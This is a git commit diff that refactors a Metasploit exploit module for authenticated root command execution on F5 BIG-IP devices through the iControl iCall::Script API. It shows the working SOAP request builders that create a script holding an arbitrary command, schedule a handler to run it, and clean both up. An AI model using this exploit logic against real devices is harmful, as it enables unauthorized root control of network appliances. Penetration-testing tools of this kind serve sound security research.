Clean up description; Simplify SOAP code more

bug/bundler_fix
Jon Hart 2015-11-16 11:06:45 -08:00
parent 1aa1d7b5e4
commit 902951c0ca
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 26 additions and 26 deletions


@ -11,16 +11,22 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
def initialize(info = {})
super(
update_info(
info,
'Name' => "F5 iControl iCall::Script Root Command Execution",
'Description' => %q{
This module exploits an authenticated a privilege escalation vulnerability
in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
(11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
This module exploits an authenticated privilege escalation
vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
other F5 devices). This requires valid credentials and the Resource
Administrator role. The exploit should work on BIG-IP 11.3.0
- 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
for more details)
},
'License' => MSF_LICENSE,
'Author' =>
@ -112,13 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote
def create_script(cmd)
scriptname = Rex::Text.rand_text_alpha_lower(5)
create_xml = build_xml do |xml|
xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.scripts(string_attrs) do
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item scriptname
end
xml.definitions(string_attrs) do
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item cmd
end
@ -129,9 +134,8 @@ class Metasploit3 < Msf::Exploit::Remote
def delete_script(scriptname)
delete_xml = build_xml do |xml|
xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.scripts(string_attrs) do
xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item scriptname
end
@ -142,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
def script_exists(scriptname)
exists_xml = build_xml do |xml|
xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(exists_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
@ -151,18 +155,16 @@ class Metasploit3 < Msf::Exploit::Remote
def create_handler(scriptname, interval)
handler_name = Rex::Text.rand_text_alpha_lower(5)
handler_xml = build_xml do |xml|
xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.handlers(string_attrs) do
xml['per'].create(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
xml.scripts(string_attrs) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item scriptname
end
long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
xml.intervals(long_attrs) do
xml.intervals(LONG_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item interval
end
@ -173,9 +175,8 @@ class Metasploit3 < Msf::Exploit::Remote
def delete_handler(handler_name)
delete_xml = build_xml do |xml|
xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.handlers(attrs) do
xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
@ -187,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
def handler_exists(handler_name)
handler_xml = build_xml do |xml|
xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(handler_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
@ -200,13 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote
# if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
# any other response is considered not vulnerable
check_xml = build_xml do |xml|
xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.scripts(attrs) do
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item
end
xml.definitions(attrs) do
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item
end